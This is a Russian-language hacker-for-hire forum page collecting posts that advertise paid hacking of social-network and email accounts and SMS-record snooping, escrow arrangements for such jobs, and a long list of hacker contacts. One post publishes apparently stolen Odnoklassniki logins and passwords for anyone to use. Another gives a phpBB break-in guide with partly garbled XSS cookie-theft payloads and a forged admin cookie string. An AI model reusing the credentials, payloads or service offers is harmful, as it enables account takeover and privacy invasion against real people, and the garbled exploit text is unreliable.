Перейти к содержимому


Самый Популярный Контент


#42 Реклама на форуме.

Написано Admin 24 Ноябрь 2015 - 19:27

Информация рекламнадателям!
Если вы решили разместить рекламу на нашем форуме в виде Банера на всех страницах форума, либо пометить ваше объявление как "Важное" и так далее.

Просьба обращаться на почту:
MRCOM@TUTANOTA.COM

Прикрепленные изображения

  • image-2.jpg
  • image-1.jpg
  • image-3.jpg
  • image.jpg

  • VilliamHauT, LeraHappy, EugenioElict и 32 другим это нравится


#344 Черный список.

Написано Admin 04 Май 2016 - 15:02

Доброго времени суток уважаемые гости и друзья форума опытных хакеров! Сегодня я хочу предложить список самых популярных кидал в сфере взлома на заказ. Если вас обманули, пиши контакты хакера в теме!!!!! Сортировка по email: 122115@mail.ru 21216@mail.ru 3lom4ik@mail.ru 2512888@mail.ru 6576432@gmail.com 923667@gmail.com 979365@gmail.com acab@crimeon.com admin@crimeon.com aooyes.com akk.info.com@gmail.com alaridsusan@yandex.ru aleksandr_hak@inbox.ru aleksandrturop@gmail.com algonco.com andrey.savelin@mail.ru andrey_fofanov@bk.ru ngelskaya@mail.ru Anjelina_kr@list.ru anjelina-kr@yandex.ru anonim@hacksystem.ru aanonim.kiber.com@gmail.com antiemail@eml.cc anton1985v@mail.ru arslan011212@mail.ru artem.6508@mail.ru artem.andreev2014@yandex.ru vkeypro@mail.ru vlad.vz@mail.ru vlechenko97@mail.ru VP770066@email.ru vz-vk@list.ru vzll.pochta@gmail.com vzlom@hackerku.net vzlom@live.com vzlom64bit@gmail.com vzlom_vzlom86@mail.ru vzlom-odnoklassnikov.net vzlom.alexei@gmail.com vzlom.life@gmail.com vzlom.nazakaz@yandex.ru vzlom.profi@gmail.com vzlom.service@gmail.com vzlom.sistema.dos@gmail.com vzlom.soc@gmail.com vzlom.na.zakaz@gmail.com vzlom-voronin@mail.ru vzlom.vzlom.vzlom@gmail.com vzlom.x.com@gmail.com vzlom-anket@yandex.ru vzlom-na-zakaz.com vzlom-xakk@yandex.ru vzlom64bit@gmail.com vzlomaem.com@gmail.com vzlomai@outlook.com vzlomal82@gmail.com vzlomnikita@mail.ru vzlomov.ru@mail.ru vzlomPro@live.ru vzlomseti@gmail.com vzlomseti.my1.ru vzlomvkontakte.net vzlomvkontakte3@gmail.com vzlomzona.narod.ru vzlomzona@gmail.com w.hanter@outlook.com welcometousluga@gmail.com www.dosug@gmail.com x4000800@gmail.com xak.pass@bk.ru xak16@bk.ru xakep-1989@ya.ru xaker3902@gmail.com xaker.brut@gmail.com xakep.ing@gmail.com xaker.klub@yahoo.com xakep.ok@bk.ru xakker@outlook.com xspiriton@yahoo.com xsslook@outlook.com z.vzloma@yandex.ru zakaz.com@mail.ru zakaz.na.vzlom@yandex.ru zakaz.v.net@yandex.ru zakaz.vzloma.84@gmail.com zakaz-email@xakep.ru zakaz-vzloma@hack-pass.com zakaz-vzloma.net zakaz-vzloma@inbox.ru zakaz-vzloma-vk@hotmail.com zakazvzloma.com zakazemail@yandex.ru zevskom@yandex.ru zharikov.petechka@mail.ru zonavzlom@yandex.ru asc@mail.ru aypro@list.ru barnyhack@yahoo.com bedoev.artem@mail.ru bondar_andreyy@ro.ru breaking_91@mail.ru bronny@xaker.ru brytto_joker@bk.ru bunker001hackers@gmail.com bypassxx@gmail.com chaiko.11@mail.ru carina.hack@yandex.ru chestnyihaker@mail.ru ck94@bk.ru ck094@yandex.ru cool.amo2010@yandex.ru corp@eml.cc crackpas@gmail.com darkman_nv@mail.ru darth.venom1@rambler.ru davzlom@mail.ru ddos.hackerr@gmail.com defix@bk.ru dekoff.i@yandex.ru den-hacker@bk.ru dima-po-vzlomy@yandex.ru dimon.d.a.joper@mail.ru dmilat75@mail.ru doctor-info@mail.ru dostrova@inbox.ru dr.clows@yandex.ru dron.anonim@mail.ru ehacking@mail.ru egor.preobrajenski@gmail.com ehacking@outlook.com engineengs@gmail.com enjoy.prohacking@gmail.com evgeniy-kovalev1994@mail.ru ex8pert@mail.ru expert@ojooo.eu fenix592@gmail.com fenix592@rambler.ru festaxoff.valera@yandex.ru forum-hackeroff.ru garantprohack@gmail.com georg.iprof@yandex.ru gfdtk-8d@bk.ru gohackpro@gmail.com good-b2b@mail.ru good-hack@yandex.ru grandsioz@yandex.ru grinA@gmail.ru grinahack.ru grinahelp@ukr.net grinahelp@gmail.com gvlechenko@bk.ru gvlechenko@mail.ru hack-pass.com hack-pass@bk.ru hack-vk.com@bk.ru hack.haman@gmail.com hack.lebedev@yandex.ru hack.log.and.pass@gmail.com hack.portal@yandex.ru hacker.80@yandex.ru hacker.email@yandex.ru haker.maksimka@mail.ru haker089@yandex.ru hakerok.86@gmail.com hackerproff.fast@gmail.com hackerpromail@gmail.com hackers.2006-2012@yandex.ru hackers_2014@yahoo.com hackharlem@gmail.com hackinghelp@yandex.ru hackmarke@yahoo.com hackmidle@gmail.com hacks-all@yandex.ru hakedmaster@gmail.com hakervzom@gmail.com HaksOpen@gmail.com hank.luk@gmail.com HardBass09.p.ht High.Quality.Hacking@yandex.ru high-quality-hacking@yandex.ru icexakep2013@yandex.ru info-07@mail.ru installWorld@yandex.ru ithackexpert@gmail.com JABBER: w.hanter@jabber.org jackhelp@hotmail.ru jackhelp@yahoo.com jaovs1@yandex.ru kaisa59@rambler.ru kay@eml.cc kc1hacker@gmail.com kirillpetrenko@ymail.com kodq@fromru.com kornilov-hack@ya.ru kornilov-hack@yandex.ru korrnev.aleksandr@gmail.com KozaNostra777@hotmail.com krystiza@mail.ru krollik@bk.ru kukla1393@mail.ru kurbanov.hack@yandex.ru kurbanov-hack@ya.ru labin.oleg@yandex.ru lamer.vzlom@gmail.com lazykent91@gmail.com lekomtsev_r@mail.ru lenya.demchenko@mail.ru line-box@mail.ru lamer1221@ya.ru Lnchshij3@yandex.ru lomaemmilo@mail.ru lommila@mail.ru mail–miedkov89@mail.ru mail.boss7@gmail.com mail.crack@yandex.ru mail.crack.ru@yandex.ru mail_crack@rocketmail.com mails-open@yandex.ru mails.passw@gmail.com MailsWizard@gmail.com makarov.hack@yahoo.com mastxack@gmail.com motherfuker1337@yandex.ru mazahacka.ru@mail.ru mega-hack87@mail.ru mega_volt_hack@yahoo.com mi1anchik@yandex.ru miedkov89@mail.ru misha.uslugi.vzloma@gmail.com moikontakty.narod.ru molhan@inbox.ru moon.anneta@mail.ru mr.white.goodhacker@gmail.com motherfuker1337@yandex.ru ness@xaker.ru nadtoka.hakcer2010@yandex.ru nikita-popov93@yandex.ru nindeti@mail.ru olgavzlom@rambler.ru orpbox@mail.ru onhack@live.ru online.hackvzlom@gmail.com pas.s.fes@gmail.com pass.vxl@gmail.com passkey14@mail.ru passv.xl@gmail.com pass-2015@yandex.ru passfes@gmail.com Pavel.Hakk@mail.ru Pavel.Hakk@yandex.ru Pavel.Hakk@gmail.com petrikov-1989@inbox.ru petrulip1@mail.ru petrulip2@mail.ru pet1482@yandex.ru pochta809@bk.ru pochtallx@mail.ru pogdevelopers@gmail.com pomoguvzlomat@gmail.com povel1988@mail.ru powerofhack@yahoo.com pro.haker@bk.ru pro.vzlom@bk.ru pro.vzlom.profil@gmail.com PROFIvzlom@ya.ru professional@programist.ru proffi_vzlom@bk.ru progproff@yandex.ru promaster499@gmail.com promhack@ymail.com pros89@bk.ru prospeedhack@gmail.com provzlom@live.ru provz1om@yandex.ru Pro-vzloma@yandex.ru pro-vzloma2009@ya.ru rack.sascha2016@yandex.ru rad4uk@yahoo.com radchuk-it@mail.ru rich.hacker2014@yandex.ru robin.pass@ymail.com romantsev.eduard@mail.ru roma.starkov.88@mail.ru roman.dudarew12@yandex.ru ruhak@xaker.ru RussianHackService@yandex.ru saita.moderator@yandex.ru satoret@yandex.ru sgegory@ymail.com servis@programist.ru shellhacker78@gmail.com sidr.nikolay@mail.ru siti.scan@mail.ru slava.hax@yandex.ru slomaem@xaker.ru sochelper01@gmail.com solovev.vasyusha@inbox.ru spyhacker@mail.ru stepan.vzlom@yandex.ru super.hackzone@yandex.ru support@hackergate.net tdssdos@gmail.com tolikzakharov@yandex.ua ttomik01@gmail.com unknow.xakep@yandex.ru uslugavk@yandex.ru uslugi.po.vzlomu@yandex.ru uslugi-hackera@rambler.ru uslugi-vzlom@mail.ru uslugivzloma@yandex.ru v-hack@mail.ru vashurkin2012@gmail.com vasya2010z@mail.ru vavasik90@mail.ru vippomoch@xaker.ru vk-od@rambler.ru Сортировка по Skype: abra-kadabra67 abrcadabr67 brytto_joker de7phi good-hack HaksOpen haker20151 KENIROKEN kioto9112 MailsWizard marina_ernest miedkov89 Nikita-popov93 nindeti Skype Pavel_Hakk powerofhack shOrtle shket30144 tx4hack vasya2010z vzlom_hack vzlom.on@yandex.ru vzlom2012 xakermen.xakermen skype@hacksystem.ru Сортировка по icq: 111-111-463 180-220 197-79-33 217-627 220-772 222-84-82 276-71-73 318-319 354-599-095 379-892 403-99-00 465-229-798 474-622-857 479-614 551-837 555-333-777 561-658-721 564-455-785 576-432 576-99-00 577-668-445 589-999-71 602-374-488 603-403-038 605-349-067 605-511-466 611-926-090 615–942-753 616-963-483 617-985-842 623-478-760 633-133-323 633-376-723 633-684-500 649-008-31 650-952-099 654-547-171 655-534-448 656-955-368 657-964-762 667-038-788 675-608-888 677-000-002 681-355-178 681-813-681 684-801-171 688-023-196 692-753-919 696-213-359 943-494-60 996-032 998-98-98 Сортировка по вконтакте: vk.com/id231591923 vk.com/id250053527 vk.com/id126683114 vk.com/id86157862 vk.com/id126683114 vk.com/id226365874 vk.com/id312650110 vk.com/id329445437 vk.com/id38168233 vk.com/ck944 vk.com/dyhaa vk.com/grinahack vk.com/hak.pro81 vk.com/hakervzlom2015 vk.com/lisaveta7 vk.com/mskk2 vk.com/powerofhack vk.com/giprof vk.com/vladimirfedorov88 Если вы нашли хакера к которуму хотели обратиться в этом списке советуем вам предостерегаться! Соблюдайте правила! №1. ПОЛЬЗУЙТЕСЬ ГАРАНТОМ! И ЧИТАЙТЕ XACKERPRO.RU (ФОРУМ ХАКЕРОВ И ПРОГРАММИСТОВ)

Прикрепленные изображения

  • 1450969123.jpg

  • Динара, acgravlomespal, boltjelsudepal и 18 другим это нравится


#950 Черный список.

Написано ANONIM 06 Июль 2016 - 22:02

Полностью поддерживаю главного администратора. Qwerty911@gmail.com
Туда же, давно работает мошенник еще тот, держите этот ящик к базе вашей, в черный список добавляйте его тоже.
  • dangtalmalipal, Verabicle, Lenadaw и 7 другим это нравится


#14 phpBB

Написано Admin 24 Ноябрь 2015 - 02:11

1) Хочу понять, как же взламываются форумы phpbb.
 
Их можно взломать 5 способами:
1) Через уязвимость highlight. Дает исполнение команд на сервере. Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
2) Получить доступ к аккаунту администратора.
3) Через уязвимость в профайле signature_bbcode_uid Подробно о баге можно почитать в разделе "Заливка шелла в phpbb"
4) Взлом через моды.
5) Взлом через sql инъекцию.
2) Как получить аккаунт администратора на форуме?
 
1) Угадать, украсть, спросить.
2) XSS - позволяет украсть куки администратора и под ним зайти на форум. В версиях >2.0.19 нельзя войти в админку незная пароля.
xss для форума phpbb. Почти все найдены White Jordan.
[c*olor*=#EFE*FEF][forbidden link][/UR*L]  phpbb 2.0.17 Рушиться структура, код надо доработать[im*g]http://ww*w.phpbb.com/xx[em*ail]xx@*xx.com[/ema*il]images/p*hplogo.gif[/i*mg] [*url]ww*w.ut[forbidden link][/u*rl]' [*url=http://www.%*5burl=http://xx.com/style=display:no*ne;backgrou*nd#58;url(javascript: alert()&+#41; %5*dxx*]http://www.<a href="http://xx.com/style=displa...) " target="_*blank*">xx[/url]
 
пихаем все эти коды в сообщение, на сниффере ловим куки, подставляем их, и мы админы.
 
3) Получение админского аккаунта через багу в куках.
phpbbmysql_data:a%3A2%3A%7Bs%3A11%3A%22autologinid %22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222% 22%3B%7D
 
И мы становимся админом (если форум не пропатчен).
3) Как происходит взлом?
1) Просмотр версии форума. Она определяется заходом по ссылке http://site.ru/forum.../CHANGELOG.html
Смотрим какая там последняя версия и прибавляем единицу.
2) Проверку на уязвимость форума к багам highlight, админским кукам, signature_bbcode_uid.
Если сработало, иди в раздел "Заливка шелла в phpbb". Если не сработало.
3) Проверяем форум на sql уязвимости.
Делаем запросы:
Если сработало, то добываем хеш админа, расшифровываем.
4) Если ничего не помогло, теперь надо проверить форум на дырки в модах.
запросы:
Запросы для получение привилегий найдете на секьюрити порталах.
5) Взлом через xss.
 
4) Как узнать серверный путь форума?
http://site.ru/forum...erlist.php?mode[]=cx + дает возможно узнать префикс таблиц базы данных
 
Пути для форумов <2.0.10
5) Как узнать префикс таблиц базы данных?

  • EROocculse, DentalTime, SusanSaX и 5 другим это нравится


#141 УСЛУГИ ВЗЛОМА СТРАНИЦ ПОЧТЫ И ДЕТАЛИЗАЦИЯ СМС. ОПЫТ РАБОТЫ, РАЗУМНЫЕ ЦЕНЫ.

Написано ~Shtorm~ 15 Февраль 2016 - 13:20

Приветствую вас Уважаемые клиенты.
Предлагаю услуги взлома страниц, социальных сетей,таких как:
Одноклассники, Vk.com, Facebook и др.
Взлом почты любых почтовых серверов, таких как:
Яндекс (Yandex), Гугл (google),
Mail.ru он же (Мой мир), Рамблер (rambler) и др.
А также выполняю детализацию смс мобильного
любых операторов сотовой связи,
детализация Skype, Viber, WhatsApp и другие.
Быстро качественно, надежно.
Опыт работы с 2009 года,
работаю по сегодняшний день и не собираюсь прекращать.
Разумные цены на услуги, опыт. Обращайтесь.

КОНТАКТНЫЕ ДАННЫЕ

Почта:√
XAKWALLET@YA.RU




ВНИМАНИЕ!
УВАЖАЕМЫЕ ПОЛЬЗОВАТЕЛИ
УБЕДИТЕЛЬНО ПРОСИМ ВАС.
ОБРАЩАТЬСЯ. НЕПОСРЕДСТВЕННО
ПО ТЕМ КОНТАКТНЫМ ДАННЫМ,
КОТОРЫЕ. МЫ УКАЗАЛИ ВЫШЕ,
В ОПИСАНИИ ТЕМЫ!
В случае если вы обращайтесь по контактным данным, которые оставил кто-то другой в комментариях, вы рискуете стать жертвой мошенников, мы не несем ответственности за это. Будьте внимательны!

Прикрепленные изображения

  • 1461058277610.jpg

  • VilliamHauT, ~Shtorm~, Admin и 3 другим это нравится


#502 Форум хакеров, приложение на Android.

Написано Admin 18 Июнь 2016 - 18:16

Доброго времени суток уважаемые гости и друзья форума хакеров профессионалов и программистов.
Наши ученики создали приложение для нашего форума. Теперь у вас есть возможность, иметь всегда под рукой инструмент для общения на форуме профессиональных хакеров и программистов.
Вы можете скачать его себе на смартфон и наслаждаться времяпроведением на нашем форуме профессионального хакера и программистов.
Мы стараемся максимально улучшить и сделать как можно комфортнее ваше времяпровождение на форуме опытных хакеров и программистов.
Заходите качайте на свой ANDROID наше приложение.


http://www.appsgeyser.com/3817684

Плюсы:
1. Экономия трафика.
2. Занимает очень мало места.
2. Почти нет нагрузки на систему (по сравнению с другими приложениями)
3. Всегда на связи с хакерским форумом.
4. Удобное в использовании.

Инструкция по установке:
Если вы решили установить данное приложение, то в настройках вашего Андроид, заходите в настройки, выбираете там пункт безопасность, находите там опцию разрешить установку из неизвестных источников. После можете свободно скачивать


Читайте форум XACKERPRO и вы будете всегда подкованы нужной вам информацией о хакерском мире.

Просьба делитесь с друзьями и приглашайте на форум профессиональных хакеров и программистов, в месте мы сила!

Приложением пользуются пользователи таких социальных сетей как:
Для общения и вопросам по взлому страниц.
http://ok.ru/
По вопросам взлома страниц.
http://vk.com/
Не редко интересует вопрос как взломать почту.
http://mail.ru/
В основном по вопросу, услуги взлома, услуги хакера
https://plus.google.com/
Чаще всего ищут форум хакеров.
http://facebook.com/
Чаще вопросы о хакерском форуме
http://twiter.com/
Ну и конечно же наш хакерский форум не забыл о нашем всем давно известном поисковике яндекс.
http://yandex.ru/
Чаще всего ищут, форум хакеров, хакерский форум, услуги хакера, услуги взлома, найти хакера, хакерские сайты. Наше приложение есть в поиске тоже.

Прикрепленные изображения

  • image-2(2).jpg

  • VilliamHauT, EROocculse, SusanSaX и 2 другим это нравится


#463 Бесплатно отдаю Страницы одноклассники.

Написано Stels 06 Июнь 2016 - 14:00

Здравствуйте всем, хотел отдать взломаные страницы, давно уже валяются, вот отдаю. Просьба не меняйте логин и пароль. Сделали что хотите с них и всё оставили как есть. Которые страницы админы забанят, просьба отписать в комментариях к этой теме. А так страницы нормальные.
Чтоб не сработала безопасность ок если заходите с мобильного, просьба скачать приложение одноклассники, и отключить службы vpn.
Берите пользуйтесь!

логин: pashk-60@mail.ru
пароль: 761216c1f2i3f4

логин: viktoriya.david.ru
пароль: 19902611@RAMBLER

логин: yulyachernyavskayaa@mail.ru
пароль: kbxrf123

логин: alexremix1323
пароль: realmadrid1323

логин: 79638814357
пароль: nastya2005

логин: 79506422281
пароль: 1509380svg

логин: 77011550001
пароль:bacha2745623

логин: 375333704386
пароль: tivogliotantobene2

логин: puchkova.alena@mail.ru
пароль: alena636401

логин: 1405sultan
пароль: sultan3105
  • VilliamHauT, EROocculse, SusanSaX и 2 другим это нравится


#418 форум-хакеров.рф В черном списке, обман пользователей

Написано Admin 29 Май 2016 - 17:52

Доброго времени суток, приветствую вас снова на форуме хакеров.
XACKERPRO.RU
Пишу по теме, прошло два дня и администратор все-таки ответил нашей Natali777 на сайте форум-хакеров.рф
Наша страница Natali777 как вы помните, просила проверить наш новый почтовый ящик-'соответственно админ не знает что ящик наш' на то можно ли ему доверять, как я и ожидал, администратор добавил нашу тему в разделе 'проверка хакеров и сервисов в интернете' на их форуме.
Наш новый почтовый ящик, который не где не фигурирует,
(вообще нигде так как он совершенно новый) оказался по их мнению мошенником, которому верить нельзя)))

можете зайти посмотреть, вот ссылка:
http://форум-хакеров...go7gooyandexru/

Для тех кто не читал тему разоблачения их форума, не поймет.
Прошу тех, кто не читал описание этой темы, вначале прочесть описание и тогда Вам всё станет ясно.
Выкладываю ссылки и скрины, чтоб всё было максимально открыто.
Вообщем таким образом форум хакеров рф занял свое место в нашем разделе черного списка.
Заходите проверяйте сами, всё максимально открыто делаю, чтоб всем было видно, как они хитро вводят в заблуждение обыкновенных пользователей, дабы выставить свои услуги реально рабочими, а остальные услуги даже не проверяются ими и автоматически объявляются мошенниками))), повторюсь (просто выставить визуально свои услуги рабочими!!) их услуги также настроены на обман пользователей, как и их форум, будьте бдительны!!!
Спасибо за внимание, я надеюсь вам была полезна наша статья.
Профессиональные хакеры и опытные программисты, не важно форум это или просто человек который предлагает свои услуги взлома или хакера, никогда не будет без проверки называть того или иного мошенником, тем самым вводя пользователя в заблуждение, дабы обратились только к ним за помощью, будьте бдительны помощи вы от них не дождетесь, вас обманут будьте бдительны!!!

Кстати на почту Go7goo@ya.ru так и не поступило не каких писем с просьбой помочь хотя-бы, они ведь должны были от чего то отталкиваться, прежде чем называть новый совершенно (повторюсь) Новый ящик, который был создан 2 дня назад, как и регистрация Natali777, на их форуме и создана тема с просьбой проверки нашего же (ящика шпиона)))

Вывод http://форум-хакеров.рф ресурс мошенников

Спасибо за внимание.
Форум хакеров XACKERPRO.RU

Прикрепленные изображения

  • image.jpg

  • VilliamHauT, Милая, EROocculse и 2 другим это нравится


#412 форум-хакеров.рф В черном списке, обман пользователей

Написано Admin 27 Май 2016 - 18:51

Доброго времени суток уважаемые друзья, сегодня я хочу рассказать вам о сайте, который создан специально чтоб получить максимум прибыли с пользователей данного ресурса (путем обмана), форум-хакеров.рф
Вообщем рассмотрим данный ресурс и некоторые его разделы.
Например раздел где можно проверить хакеров, убирают в этом разделе они конкурентов а именно, если человек начинает сомневаться в честности какого либо хакера, люди пишут туда его почту и ждут что им ответят по поводу того или иного хакера.
На самом деле все запросы по проверке контактных данных кроме своих личных они отвечают что доверять нельзя, только когда вы пишите лично их данные или данные их человека, я вообще не удивлюсь что самого админа почту, который также предлагает взлом или еще какие услуги только тогда они пишут положительно (типо доверять можно).

ПРИМЕР РАЗОБЛАЧЕНИЯ ИХ В ОБМАНЕ:
1.Создаем регистрацию почтового ящика, в моем случае я создал ящик Go7goo@yandex.ru (будем проверять сами свой ящик новый на честность наших услуг которых нет вообще, так как ящик новый!!!)))
2.Создаём регистрацию на их форуме
http://форум-хакеров.рф
Моё имя там сделал для достоверности Natali777

3.После того как создали ящик и регистрацию на их сайте, создаем тему в разделе "Проверка хакеров и сервисов в интернете"
http://форум-хакеров.рф
Содержание темы типо: Здравствуйте проверьте пожалуйста хакера, ему можно верить или нет, вот его почта Go7goo@yandex.ru (наша совсем новая почта) нашла в интернете а обращаться или нет не знаю, боюсь.
Спасибо вам за ранее.
После этого на нашу почту не поступает не каких писем, хотя должны по идее, они ведь типо проверяют, а тема о том что наш ящик "хакер мошенник" появляется у них на сайте.
Интересно когда он успел кого обмануть? Ящик то новый, и не рекламировался не где, но он уже автоматически в их черном списке интересно как правда))).
Таким образом делаем вывод, данный ресурс настроен под то чтобы ввести пользователей в заблуждение и только их почты и ресурс выставить во всей красе чтоб по иметь денег с доверчивых юзеров (пользователей).
Ах да еще несколько сайтов которые уже добились хорошей репутации и им её не поставить под сомнения, они также пишут нормальный отзыв, ну просто потому что тягаться бесполезно и они это знают, дабы правдивее выглядеть.
Таких хитромудрых схем целая масса, будьте бдительны.
Тема посвящена ресурсу мошенников http://форум-хакеров.рф



Советуйтесь как быть в той или иной ситуации и читайте наш форум хакеров XACKERPRO.RU



Доброго времени суток уважаемые друзья, сегодня я хочу рассказать вам о сайте, который создан специально чтоб получить максимум прибыли с пользователей данного ресурса (путем обмана), форум-хакеров.рф
Вообщем рассмотрим данный ресурс и некоторые его разделы.
Например раздел где можно проверить хакеров, убирают в этом разделе они конкурентов а именно, если человек начинает сомневаться в честности какого либо хакера, люди пишут туда его почту и ждут что им ответят по поводу того или иного хакера.
На самом деле все запросы по проверке контактных данных кроме своих личных они отвечают что доверять нельзя, только когда вы пишите лично их данные или данные их человека, я вообще не удивлюсь что самого админа почту, который также предлагает взлом или еще какие услуги только тогда они пишут положительно (типо доверять можно).

ПРИМЕР РАЗОБЛАЧЕНИЯ ИХ В ОБМАНЕ:
1.Создаем регистрацию почтового ящика, в моем случае я создал ящик Go7goo@yandex.ru (будем проверять сами свой ящик новый на честность наших услуг которых нет вообще, так как ящик новый!!!)))
2.Создаём регистрацию на их форуме
http://форум-хакеров.рф
Моё имя там сделал для достоверности Natali777

3.После того как создали ящик и регистрацию на их сайте, создаем тему в разделе "Проверка хакеров и сервисов в интернете"
http://форум-хакеров.рф
Содержание темы типо: Здравствуйте проверьте пожалуйста хакера, ему можно верить или нет, вот его почта Go7goo@uandex.ru (наша совсем новая почта) нашла в интернете а обращаться или нет не знаю, боюсь.
Спасибо вам за ранее.
После этого на нашу почту не поступает не каких писем, хотя должны по идее, они ведь типо проверяют, а тема о том что наш ящик "хакер мошенник" появляется у них на сайте.
Интересно когда он успел кого обмануть? Ящик то новый, и не рекламировался не где, но он уже автоматически в их черном списке интересно как правда))).
Таким образом делаем вывод, данный ресурс настроен под то чтобы ввести пользователей в заблуждение и только их почты и ресурс выставить во всей красе чтоб по иметь денег с доверчивых юзеров (пользователей).
Ах да еще несколько сайтов которые уже добились хорошей репутации и им её не поставить под сомнения, они также пишут нормальный отзыв, ну просто потому что тягаться бесполезно и они это знают, дабы правдивее выглядеть.
Таких хитромудрых схем целая масса, будьте бдительны.
Тема посвящена ресурсу мошенников http://форум-хакеров.рф
[/b]


Советуйтесь с нами как быть в той или иной ситуации и читайте форум хакеров XACKERPRO.RU на страже порядка.
До новых встреч.

Прикрепленные изображения

  • Screenshot_2016-05-27-19-20-22.jpg
  • Screenshot_2016-05-27-19-22-40.jpg
  • Screenshot_2016-05-27-19-31-13.jpg

  • VilliamHauT, EROocculse, SusanSaX и 2 другим это нравится


#362 Услуги хакера, Взлом и установка программ шпионов.

Написано Stels 09 Май 2016 - 08:57

Кому нужны страницы вк?! Пишите отдам даром. Страницы взломаные без изменения пароля. Жду заявки. Страницы модераторов групп вконтакте.
  • VilliamHauT, Rippy, EROocculse и 2 другим это нравится


#33 Делитесь опытом.

Написано Admin 24 Ноябрь 2015 - 14:40

Делимся опытом с которым сталкивались по компьютерной тематике, интернет, взлом и т.д
  • VilliamHauT, EROocculse, GioresMi и 2 другим это нравится


#1243 Магазин Онлайн!

Написано Opasniy 16 Август 2016 - 00:35

Доброго времени суток !

Лучший Магазин Аккаунтов и много другова !
9f3773b9eae2.gif

  • Opasniy, Garik_banditos, EROocculse и 2 другим это нравится


#1031 Спасибо Stels

Написано Aliyans777 30 Июль 2016 - 15:37

Спасибо хакеру stels
Я очень рад что обратился за помощью к нему. Было страшно скажу честно, меня до этого уже один раз обманули не хотелось бы чтоб это сделали еще раз, боялся я)))) вообщем спасибо за выполненную работу. Этому человеку нужно доверять. unitstels@ya.ru
  • Davidfer, EROocculse, VaidokLib и 2 другим это нравится


#930 Партнеры по продвижению.

Написано Admin 04 Июль 2016 - 23:33

Доброго времени суток уважаемые пользователи и гости.
Форум хакеров приветствует вас.
Хотелось бы поблагодарить наших партнеров, которые трудятся во благо форума на разных площадках интернета, российские сайты и не только. Сегодня выложу ссылки на страницы и группы на зарубежных площадках, таких как:
http://fb.com

http://plus.google.com

http://twiter.com

В дальнейшем пополним базу и российскими ссылками на страницы и группы которые созданы для развития форума.

Прикрепленные изображения

  • top-5-haker-programm.jpg

  • олег, EROocculse, SusanSaX и еще 1 это нравится


#7 Утилита AVZ

Написано Admin 23 Ноябрь 2015 - 10:54

Меня попросили выполнить скрипт в AVZ. Как мне его выполнить?
Ответ: Открыть AVZ , вверху в меню выбрать Файл -> Выполнить скрипт -> Скопировать предложенный вам скрипт -> Нажать на кнопку Запустить.
 
Как обновить утилиту?
Перед сбором логов системы, пожалуйста, обновите утилиту! Это можно сделать так:
1. Запустите avz
2. В меню Файл выберите пункт Обновление баз
3. Обновите базы.

  • VilliamHauT, EROocculse, SusanSaX и еще 1 это нравится


#361 ХАКЕRPRO Приложение для андроид.

Написано Admin 09 Май 2016 - 00:19

Доброго времени суток уважаемые гости и друзья форума хакеров профессионалов и программистов.
Наши ученики создали приложение для нашего форума. Теперь у вас есть возможность, иметь всегда под рукой инструмент для общения на форуме профессиональных хакеров и программистов.
Вы можете скачать его себе на смартфон и наслаждаться времяпроведением на нашем форуме профессионального хакера и программистов.
Мы стараемся максимально улучшить и сделать как можно комфортнее ваше времяпровождение на форуме опытных хакеров и программистов.
Заходите качайте на свой ANDROID наше приложение.


http://www.appsgeyser.com/3817684

Плюсы:
1. Экономия трафика.
2. Занимает очень мало места.
2. Почти нет нагрузки на систему (по сравнению с другими приложениями)
3. Всегда на связи с хакерским форумом.
4. Удобное в использовании.

Инструкция по установке:
Если вы решили установить данное приложение, то в настройках вашего Андроид, заходите в настройки, выбираете там пункт безопасность, находите там опцию разрешить установку из неизвестных источников. После можете свободно скачивать


Читайте форум XACKERPRO и вы будете всегда подкованы нужной вам информацией о хакерском мире.

Просьба делитесь с друзьями и приглашайте на форум профессиональных хакеров и программистов, в месте мы сила!

Приложением пользуются пользователи таких социальных сетей как:
Для общения и вопросам по взлому страниц.
http://ok.ru/
По вопросам взлома страниц.
http://vk.com/
Не редко интересует вопрос как взломать почту.
http://mail.ru/
В основном по вопросу, услуги взлома, услуги хакера
https://plus.google.com/
Чаще всего ищут форум хакеров.
http://facebook.com/
Чаще вопросы о хакерском форуме
http://twiter.com/
Ну и конечно же наш хакерский форум не забыл о нашем всем давно известном поисковике яндекс.
http://yandex.ru/
Чаще всего ищут, форум хакеров, хакерский форум, услуги хакера, услуги взлома, найти хакера, хакерские сайты. Наше приложение есть в поиске тоже.

Прикрепленные изображения

  • image-2.jpg

  • EROocculse, SusanSaX, Loans Online и еще 1 это нравится


#246 Как провести безопасную сделку?

Написано Admin 28 Февраль 2016 - 23:42

fae4d419dff2.jpg498186ab30e0.png
Приветствую, дорогие посетители и пользователи форума, в связи с последними событиями и многочисленным кидаловом людей, мы решили вести прямую борьбу с этим беспределом и создали открытый сервис как для клиентов так и для специалистов.

Кому будет интересна безопасная сделка и в чем ее гарантии?

Тут все просто, Вы заказчик, не можете доверить сумму исполнителю и хотите работать без предоплаты, в свою очередь исполнитель тоже тратит средства на работу и не может быть уверен в Вашей стороне и по любым другим причинам не хочет выполнять заказ без платежа.

Лучший выход тут - безопасная сделка.90% возврата и выплаты средств любой стороне.

 

Преимущества сделки в том, что ни администратор, ни заказчик, ни исполнитель не смогут внести никаких поправок в сделку, все предельно честно, если работа не выполнена - средства на возврат, если выполнена - средства на выплату.
Схема работы: Заказчик ----> создание личного сообщения администратору-----> оплата в фонд форума ------> получение результата
Исполнитель -----> подтверждение в теме (которая будет создана администратором для сделки) ------> выполнение работы ------> получение средств.
МЫ НЕ ЯВЛЯЕМСЯ ГАРАНТОМ!!! Гарант - это схема не совсем честная, будьте бдительны!
Основные правила:

1. Сделку может провести абсолютно любой желающий пользователь и гость форума.

2. Все сделки и договоренности заключаются напрямую с исполнителем и клиентом, без участия третьей стороны, при условии открытии сделки на общее обозрение команде и пользователям форума

(по желанию заказчика соответственно).

3. Клиент и исполнитель обязаны действовать строго по заявке (см. ниже)

Заказчик или исполнитель создает сообщение администратору сайта с названием сделки например:

Тема: Взлом вконтакте

Текст: Совершаю сделку с пользователем admin (указывает ник исполнителя) , по услуге взлома вконтакте (описываете суть сделки), с правилами форума ознакомлен и согласен. Комиссию в фонд форума оплачиваю я. Сумма сделки: 1 0000 рублей. Сроки работы : 2 дня. (Это пример!)


После второй оппонент сделки обязан отписаться, что принимает условия форума и подтверждает сделку.
Администратор подтверждает и одобряет сделку, сразу после оплаты суммы в фонд форума с комиссией. Сумма из фонда выплачивается исполнителю сразу, после Успешно выполненной работы.

